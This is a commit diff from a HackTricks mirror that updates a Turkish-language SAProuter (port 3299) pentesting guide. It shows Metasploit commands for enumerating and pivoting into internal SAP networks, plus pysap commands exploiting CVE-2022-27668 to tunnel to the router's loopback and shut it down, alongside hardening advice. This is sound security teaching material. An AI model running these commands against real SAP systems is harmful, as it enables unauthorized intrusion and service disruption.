maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/network-services-pentesting/3299-pentesting-saprouter.m

Browse Source
This commit is contained in:
Translator 2025-08-14 06:16:00 +00:00
parent f60804cbf0
commit b42390c445
1 changed files with 70 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

77
src/network-services-pentesting/3299-pentesting-saprouter.md
View File

@ -1,13 +1,15 @@
# # 3299/tcp - Pentesting SAProuter
{{#include ../banners/hacktricks-training.md}}
```text
PORT STATE SERVICE VERSION
3299/tcp open saprouter?
```
Bu, [https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/](https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/) adresinden yapılan bir gönderinin özetidir.
Bu, [https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/](https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/) adresindeki gönderinin bir özetidir.
## Metasploit ile SAProuter Penetrasyonu Anlama
SAProuter, SAP sistemleri için bir ters proxy olarak işlev görür ve esasen internet ile dahili SAP ağları arasındaki erişimi kontrol etmek için kullanılır. Genellikle, organizasyonel güvenlik duvarları aracılığıyla TCP port 3299'un açılmasıyla internete maruz bırakılır. Bu yapı, SAProuter'ı penetrasyon testi için cazip bir hedef haline getirir çünkü yüksek değerli dahili ağlara bir geçit işlevi görebilir.
SAProuter, SAP sistemleri için bir ters proxy olarak işlev görür ve esasen internet ile dahili SAP ağları arasındaki erişimi kontrol etmek için kullanılır. Genellikle, TCP port 3299'un kurumsal güvenlik duvarları aracılığıyla internete açılmasıyla internete maruz kalır. Bu yapı, SAProuter'ı penetrasyon testi için cazip bir hedef haline getirir çünkü yüksek değerli dahili ağlara bir kapı görevi görebilir.
**Tarama ve Bilgi Toplama**
@ -25,7 +27,7 @@ msf auxiliary(sap_router_info_request) > run
```
**İç Hizmetlerin Sayımı**
Elde edilen iç ağ bilgileriyle, **sap_router_portscanner** modülü, SAProuter aracılığıyla iç hostları ve hizmetleri sorgulamak için kullanılır ve bu da iç ağlar ve hizmet yapılandırmaları hakkında daha derin bir anlayış sağlar.
Elde edilen iç ağ bilgileriyle, **sap_router_portscanner** modülü, SAProuter üzerinden iç hostları ve hizmetleri sorgulamak için kullanılır ve bu da iç ağlar ve hizmet yapılandırmaları hakkında daha derin bir anlayış sağlar.
```text
msf auxiliary(sap_router_portscanner) > set INSTANCES 00-50
msf auxiliary(sap_router_portscanner) > set PORTS 32NN
@ -41,9 +43,9 @@ msf auxiliary(sap_router_portscanner) > set PORTS 80,32NN
```
**İç Hostların Kayıt Dışı Sayımı**
SAProuter'dan doğrudan bilgi sınırlı olduğunda, kayıt dışı sayım gibi teknikler uygulanabilir. Bu yaklaşım, iç hostname'lerin varlığını tahmin etmeye ve doğrulamaya çalışarak, doğrudan IP adresleri olmadan potansiyel hedefleri ortaya çıkarır.
SAProuter'dan doğrudan bilgi alımının sınırlı olduğu senaryolarda, kayıt dışı sayım gibi teknikler uygulanabilir. Bu yaklaşım, iç host adlarının varlığını tahmin etmeye ve doğrulamaya çalışarak, doğrudan IP adresleri olmadan potansiyel hedefleri ortaya çıkarır.
**Sızma Testi için Bilgilerin Kullanımı**
**Sızma Testi İçin Bilgilerin Kullanılması**
ı haritaladıktan ve erişilebilir hizmetleri belirledikten sonra, sızma test uzmanları Metasploit'in proxy yeteneklerini kullanarak SAProuter üzerinden iç SAP hizmetlerinin daha fazla keşfi ve istismarı için geçiş yapabilirler.
```text
@ -53,13 +55,74 @@ msf auxiliary(sap_hostctrl_getcomputersystem) > run
```
**Sonuç**
Bu yaklaşım, güvenli SAProuter yapılandırmalarının önemini vurgular ve hedefli pentesting ile iç ağlara erişim potansiyelini öne çıkarır. SAP yönlendiricilerini doğru bir şekilde güvence altına almak ve ağ güvenliği mimarisindeki rollerini anlamak, yetkisiz erişime karşı korunmak için kritik öneme sahiptir.
Bu yaklaşım, güvenli SAProuter yapılandırmalarının önemini vurgulamakta ve hedefli pentesting ile iç ağlara erişim sağlama potansiyelini ortaya koymaktadır. SAP yönlendiricilerini düzgün bir şekilde güvence altına almak ve ağ güvenliği mimarisindeki rollerini anlamak, yetkisiz erişime karşı korunmak için kritik öneme sahiptir.
Metasploit modülleri ve bunların kullanımı hakkında daha ayrıntılı bilgi için [Rapid7'nin veritabanını](http://www.rapid7.com/db) ziyaret edin.
## **Kaynaklar**
---
## Son Güvenlik Açıkları (2022-2025)
### CVE-2022-27668 Yanlış Erişim Kontrolü ➜ Uzaktan Yönetim Komutu İcraatı
Haziran 2022'de SAP, SAProuter'daki (tüm çekirdekler ≥ 7.22) kritik bir açığı (CVSS 9.8) ele alan Güvenlik Notu **3158375** yayınladı. Kimlik doğrulaması yapılmamış bir saldırgan, `-X` uzaktan yönetim seçeneği olmadan başlatılmış olsa bile, uzaktaki bir hosttan **yönetim paketleri** (örneğin *shutdown*, *trace-level*, *connection-kill*) göndermek için izin verici `saprouttab` girişlerini kötüye kullanabilir.
Sorun, belirtilmemiş adres **0.0.0.0** hedef alınarak yönlendiricinin kendi döngü arayüzüne bir tünel oluşturma olasılığından kaynaklanmaktadır. Tünel kurulduğunda, saldırgan yerel host ayrıcalıklarına sahip olur ve herhangi bir yönetim komutunu çalıştırabilir.
Pratik istismar, **pysap** çerçevesi ile yeniden üretilebilir:
```bash
# 1. Build a loopback tunnel through the vulnerable SAProuter
python router_portfw.py -d <ROUTER_IP> -p 3299 \
-t 0.0.0.0 -r 3299 \
-a 127.0.0.1 -l 3299 -v
# 2. Send an admin packet (here: stop the remote router)
python router_admin.py -s -d 127.0.0.1 -p 3299
```
**Etkilenen sürümler**
* Bağımsız SAProuter 7.22 / 7.53
* Kernel 7.49, 7.77, 7.81, 7.857.88 (dahil KRNL64NUC/UC)
**Düzeltme / Hafifletme**
1. SAP Notu **3158375** ile sağlanan yamanın uygulanması.
2. `saprouttab` içindeki `P` ve `S` satırlarından joker karakter (`*`) hedeflerinin kaldırılması.
3. Yönlendiricinin `-X` seçeneği olmadan başlatıldığından ve **doğrudan** İnternete maruz kalmadığından emin olunması.
---
## Güncellenmiş Araçlar & Hileler
* **pysap** aktif olarak bakımda ve özel NI/Yönlendirici paketleri oluşturmak, ACL'leri fuzzlamak veya CVE-2022-27668 istismarını otomatikleştirmek için `router_portfw.py`, `router_admin.py` & `router_trace.py` sağlar.
* **Nmap** özel SAProuter probunu ekleyerek hizmet tespitini genişletin:
```text
Probe TCP SAProuter q|\x00\x00\x00\x00|
ports 3299
match saprouter m|SAProuter ([\d.]+)| p/SAProuter/ v/$1/
```
NSE betikleri veya `--script=banner` ile birleştirerek banner dizesini (`SAProuter <ver> on '<host>'`) sızdıran sürümleri hızlı bir şekilde parmak izi çıkarın.
* **Metasploit** yukarıda gösterilen yardımcı modüller, pysap ile oluşturulan bir SOCKS veya NI proxy üzerinden çalışmaya devam eder, bu da yönlendirici doğrudan erişimi engellese bile tam çerçeve entegrasyonu sağlar.
---
## Güçlendirme & Tespit Kontrol Listesi
* Perimeter güvenlik duvarında **3299/TCP** portunu filtreleyin yalnızca güvenilir SAP destek ağlarından gelen trafiğe izin verin.
* SAProuter'ı **tamamen yamalı** tutun; `saprouter -v` ile doğrulayın ve en son kernel yamanın seviyesine karşı karşılaştırın.
* `saprouttab` içinde **katı, host-spesifik** girişler kullanın; `*` joker karakterlerden kaçının ve rastgele host veya portları hedefleyen `P`/`S` kurallarını reddedin.
* Servisi **`-S <secudir>` + SNC** ile başlatın, böylece şifreleme ve karşılıklı kimlik doğrulama zorunlu hale gelir.
* Uzaktan yönetimi devre dışı bırakın (`-X`) ve mümkünse dinleyiciyi `127.0.0.1`'e bağlayın, gerekli trafik için harici bir ters proxy kullanın.
* Şüpheli `ROUTER_ADM` paketleri veya `0.0.0.0`'a beklenmedik `NI_ROUTE` istekleri için **dev_rout** günlüğünü izleyin.
---
## **Referanslar**
- [https://www.rapid7.com/blog/post/2014/01/09/piercing-saprouter-with-metasploit/](https://www.rapid7.com/blog/post/2014/01/09/piercing-saprouter-with-metasploit/)
- [https://sec-consult.com/vulnerability-lab/advisory/improper-access-control-in-sap-saprouter/](https://sec-consult.com/vulnerability-lab/advisory/improper-access-control-in-sap-saprouter/)
## Shodan